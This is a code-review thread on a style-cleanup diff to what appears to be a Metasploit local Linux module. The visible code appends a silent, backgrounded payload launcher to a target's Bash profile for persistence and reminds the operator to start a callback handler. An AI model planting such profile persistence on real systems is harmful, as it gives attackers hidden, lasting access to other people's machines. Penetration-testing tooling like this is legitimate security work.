modules/exploits/linux/local/bash_profile_persistence.rb

```diff
@@ -92,27 +95,27 @@ def exploit
     # write payload trigger to Bash profile
     exec_payload_string = "#{payload_file} > /dev/null 2>&1 &" + "\n" # send stdin,out,err to /dev/null
     append_file(profile_path, exec_payload_string)
-    print_good("Created Bash profile persistence")
-    print_status("Payload will be triggered when target opens a Bash terminal")
+    print_good('Created Bash profile persistence')
+    print_status('Payload will be triggered when target opens a Bash terminal')
     print_warning("Don't forget to start your handler:")
     print_warning("msf> handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}")
   end
 
   # create a backup copy of the target's Bash profile on the local system before persistence is added
   def create_backup_file(backup_profile)
     begin
-      hostname = session.sys.config.sysinfo["Computer"]
-    rescue
-      hostname = cmd_exec("hostname")
+      hostname = session.sys.config.sysinfo['Computer']
+    rescue StandardError
```

Comment:
I'm going to presume this change is ok. If it isn't we'll find out soon enough.

Reply:
```suggestion
    rescue NoMethodError
```

Since sysinfo will return `nil` if not on meterpreter this **should** just return a `NoMethodError` for `[]`.

Reply:
> Since sysinfo will return `nil` if not on meterpreter this **should** just return a `NoMethodError` for `[]`.

Fixed.